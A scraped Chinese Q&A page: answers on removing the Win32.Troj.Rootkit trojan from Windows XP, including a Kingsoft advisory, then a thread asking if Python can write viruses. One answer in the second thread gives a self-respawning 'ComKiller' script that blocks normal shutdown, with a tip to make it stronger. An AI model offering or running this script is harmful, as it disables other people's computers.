求病毒杀手！这是啥病毒？这么厉害？

Posted 2023-04-05

病毒名称
win32.troj.rootkit 或者RootKit.win32.wantr.e

我的卡巴斯基和他搏斗了一个星期了，怎么也杀不掉，安全模式也不行，删文件也找不到，隐藏了找不到。
我的系统XP，杀毒软件卡巴斯基，查毒多次，只有这一个病毒了。我想重装系统（一年多没重装了），但我在其余两个盘存了大量资料，不想格掉。备份又怕把病毒也备过去。现在安全模式也进不去了，我是把卡巴关掉才进来的，如何解决？请高手帮忙！！谢谢~~！

谢绝东抄西拼，请真正懂行的指点！！感谢~~

"Rootkit Win32.Troj.Rootkit"

这是用于驱动级隐藏的程序，一般做为病毒的辅助文件，而存在于感染机器上，其最主要的作用，就是帮助病毒体进行文件、注册表进程等的隐藏，一旦驱动发生作用。病毒体就会从用户的进程列表、文件管理器、注册表管理器中消失。也便从用户的视野中消失。即便对于一些安全软件监控来说，有时也很难发现使用驱动技术隐藏的病毒身影。而最近的闹的沸沸扬扬的“Sony BMG CD”事件，也与该类Rootkit相关
==方法是：

1.)检查注册表
看HKEY_LOCAL_MACHINE＼SOFTWARE＼Microsoft＼Windows＼Curren Version和

HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion下，所有

以“Run”开头的键值名，其下有没有可疑的文件名。如果有，就需要删除相应的

键值，再删除相应的应用程序。
2.)检查启动组
木马们如果隐藏在启动组虽然不是十分隐蔽，但这里的确是自动加载运行的好场

所，因此还是有木马喜欢在这里驻留的。启动组对应的文件夹为：C:＼windows＼

start menu＼programs＼startup，在注册表中的位置：HKEY_CURRENT_USER＼

Software＼Microsoft＼Windows＼CurrentVersion＼Explorer＼Shell
Folders Startup="C:＼windows＼start menu＼programs＼startup"。要注意经

常检查这两个地方哦！
3.)Win.ini以及System.ini也是木马们喜欢的隐蔽场所，要注意这些地方
比方说，Win.ini的[Windows]小节下的load和run后面在正常情况下是没有跟什么

程序的，如果有了那就要小心了，看看是什么；在System.ini的[boot]小节的

Shell=Explorer.exe后面也是加载木马的好场所，因此也要注意这里了。当你看

到变成这样：Shell=Explorer.exe wind0ws.exe，请注意那个wind0ws.exe很有可

能就是木马服务端程序！赶快检查吧。
4.)对于下面所列文件也要勤加检查，木马们也很可能隐藏在那里
C:＼windows＼winstart.bat、C:＼windows＼wininit.ini、Autoexec.bat。
5.)如果是EXE文件启动，那么运行这个程序，看木马是否被装入内存，端口是否

打开。如果是的话，则说明要么是该文件启动木马程序，要么是该文件捆绑了木

马程序，只好再找一个这样的程序，重新安装一下了。
6.)万变不离其宗，木马启动都有一个方式，它只是在一个特定的情况下启动
所以，平时多注意一下你的端口，查看一下正在运行的程序，用此来监测大部分
木马应该没问题的。

还可以用超级兔子 "http://www.pctutu.com/" 参考技术A 不要着急，你这个问题我也遇到过，我的系统是XP的，只要一上网就疯狂的报这个问题！一上网就犯病！后来让我搞定了!~~

你先下载一个木马的专杀工具就可以了！！断开网线！上瑞星的网站上就有！最好是杀毒后重起机器，但不要上网，再杀一次！看看还有没有！（你也可以上瑞星的网站把这个文件报告可疑文件）
再或是找一张瑞星的杀毒软件2006正版为好，可以去借！装上后先升级再杀毒！问题就会解决！
最后也必不可少，下载最新版的冲击波和震荡波的专杀工具（网上很好找的），再杀毒一次！！并装上补丁！
完事后在点击XP的windows update（就在开始菜单里有）进入网站下载所有的安全补丁，并在以后的日子里，将开始-程序-附件-系统信息-安全中心里的自动更新打开，并设置成下载更新，…通知我…那项，所以你今后一上网只要有新的安全补丁，它就会自动下载，并提示你安装！！

你试试看吧！应该没问题了，把你的电脑武装起来，看哪个病毒小子还敢前来侵犯！！

建议迫不得已不要重装系统，一来太麻烦，二来不见得能够解决问题，怕是别的盘也感染了病毒！！！要是这样的话，只格了系统盘重装也无济于事！！本回答被提问者采纳 参考技术B “内核木马”病毒程序(Win32.Troj.RootKit)
2004年09月20日 16:37 金山毒霸信息安全网
“内核木马”（Win32.Troj.RootKit） 威胁级别：★★

据金山毒霸反病毒工程师介绍，这是一个内核木马，它会把自己的进程、在注册表中的键值、创建的文件、创建的服务都隐藏起来，尽最不被受感染机器的用户发现，以便木马长久驻留在受害者机器中。该病毒会窃取用户的系统和个人资料，记录用户的键盘输入后保存在文件rt_passfile.txt中，并会通过该木马泄露出去。

同时，该病毒可以接收外界发送的预定义指令，如上传下载文件、运行程序、更新木马和配置文件、设置访问密码、对指定网址发动DDOS攻击等，用户一旦中了该木马就很难清除掉，对用户造成的危害是比较大的。金山毒霸已对该病毒做了处理，请用户及时升级病毒库，严防该病毒给您带来威胁。

金山毒霸反病毒专家提醒用户：

1、经常升级安全补丁。大多数网络病毒是通过系统漏洞进行传播，像冲击波、震荡波等，建议用户应该定期到微软网站去下载最新的安全补丁，切实做好防范工作。

2、建立良好的安全习惯。对一些来历不明的邮件及附件不要打开，不要上一些不太了解的网站、不要执行从Internet下载后未经杀毒软件处理的文件，这些才能确保您的计算机更安全。

金山毒霸反病毒工程师提醒您：请升级毒霸到2004年09月19日的病毒库可完全处理该病毒。如没有安装金山毒霸，可以登录到 http://online.kingsoft.com/ 使用金山毒霸的在线查毒或金山毒霸下载版来防止该病毒的入侵。

参考资料：http://db.kingsoft.com/c/2004/09/20/137020.shtml

参考技术C 这类病毒都是跳跳蛋，运行后能把自己隐藏起来，确切说是杀了他的进程也找不到那个程序，解决办法这样比较方便：
用光盘装系统（不删除原系统，安装第二系统，双系统），安装之后，一般不太邪乎的病毒都不会立刻动作的，然后你立刻装系统补丁和杀毒软件上网更新病毒库，然后断线全盘扫描。这样操作之后，你原先的系统5成还能使用！之所以是5成而不是9成，并不是说系统坏了，只是说现在杀毒软件虽然很多，可是近一年来小病毒和木马类的东西实在太多太新，杀毒软件根本不报警，更有趣的是，我给一家叫做JS的公司发去病毒样本包，他们模版回信告诉我没查到病毒（废话啊，你查的到我还给你发新样本？）所以说，并不建议你使用原系统。
另外，如果可能，装系统前（硬盘小于137G用Dos，硬盘大用Winpe新版），进去删除Document。。。。和Programfiles。。目录，其他文件夹以后挂好杀毒软件再处理。
个人家使用电脑我了解，很多数据舍不得，宁可试验三番两次装系统也舍不得删除它们（无论哪个盘符下），所以并不是一定要按照“格式化－然后－装系统”的条条来办的。我的分区基本上是两三年都不动的。中了毒手动摘摘就搞定了，没必要落个格式化那么夸张。哦对了，双系统甚至多系统并不是很浪费空间的，而且对使用很有帮助。几乎不用进Dos就能长期使用系统（双系统冗余，嘻嘻）。我的机器真系统装了6个。各有用途。很少有病毒把他们通吃的。 参考技术D --------------------------------------------------------------------------------

这类病毒都是跳跳蛋，运行后能把自己隐藏起来，确切说是杀了他的进程也找不到那个程序，解决办法这样比较方便：
用光盘装系统（不删除原系统，安装第二系统，双系统），安装之后，一般不太邪乎的病毒都不会立刻动作的，然后你立刻装系统补丁和杀毒软件上网更新病毒库，然后断线全盘扫描。这样操作之后，你原先的系统5成还能使用！之所以是5成而不是9成，并不是说系统坏了，只是说现在杀毒软件虽然很多，可是近一年来小病毒和木马类的东西实在太多太新，杀毒软件根本不报警，更有趣的是，我给一家叫做JS的公司发去病毒样本包，他们模版回信告诉我没查到病毒（废话啊，你查的到我还给你发新样本？）所以说，并不建议你使用原系统。
另外，如果可能，装系统前（硬盘小于137G用Dos，硬盘大用Winpe新版），进去删除Document。。。。和Programfiles。。目录，其他文件夹以后挂好杀毒软件再处理。
个人家使用电脑我了解，很多数据舍不得，宁可试验三番两次装系统也舍不得删除它们（无论哪个盘符下），所以并不是一定要按照“格式化－然后－装系统”的条条来办的。我的分区基本上是两三年都不动的。中了毒手动摘摘就搞定了，没必要落个格式化那么夸张。哦对了，双系统甚至多系统并不是很浪费空间的，而且对使用很有帮助。几乎不用进Dos就能长期使用系统（双系统冗余，嘻嘻）。我的机器真系统装了6个。各有用途。很少有病毒把他们通吃的.
不要着急，你这个问题我也遇到过，我的系统是XP的，只要一上网就疯狂的报这个问题！一上网就犯病！后来让我搞定了!~~

你先下载一个木马的专杀工具就可以了！！断开网线！上瑞星的网站上就有！最好是杀毒后重起机器，但不要上网，再杀一次！看看还有没有！（你也可以上瑞星的网站把这个文件报告可疑文件）
再或是找一张瑞星的杀毒软件2006正版为好，可以去借！装上后先升级再杀毒！问题就会解决！
最后也必不可少，下载最新版的冲击波和震荡波的专杀工具（网上很好找的），再杀毒一次！！并装上补丁！
完事后在点击XP的windows update（就在开始菜单里有）进入网站下载所有的安全补丁，并在以后的日子里，将开始-程序-附件-系统信息-安全中心里的自动更新打开，并设置成下载更新，…通知我…那项，所以你今后一上网只要有新的安全补丁，它就会自动下载，并提示你安装！！

你试试看吧！应该没问题了，把你的电脑武装起来，看哪个病毒小子还敢前来侵犯！！

建议迫不得已不要重装系统，一来太麻烦，二来不见得能够解决问题，怕是别的盘也感染了病毒！！！要是这样的话，只格了系统盘重装也无济于事！！

python能写病毒或者木马啥的吗？

# 这是一个小病毒，名叫ComKiller(计算机杀手)
# 效果：运行约10秒后无法正常关机
# 注：把那两行 time.sleep(0.1) 去掉效果更好哦:)
import os
import signal
import ctypes
import time
import threading
from pathlib import Path

def help_sos():
cmdr = os.system("start python %s" % FileName)

def Error():
while True:
try:
help_sos()
except BaseException:
help_sos()
time.sleep(0.1)

signal.signal(signal.SIGTERM, help_sos)
FileName = Path(__file__).name
while True:
time.sleep(1)
T = threading.Thread(target = Error, args = ())
T.start()
#仅用于娱乐，干什么非法的事情和我无关！ 参考技术A Python写个破坏Windows系统的代码轻而易举 参考技术B 强一点的， 参考技术C 能 参考技术D 可以。但是win上有python的人少，mac和linux虽然默认有python但是这两种系统比win要安全，所以实际上用python写malware的情况很少很少。本回答被提问者和网友采纳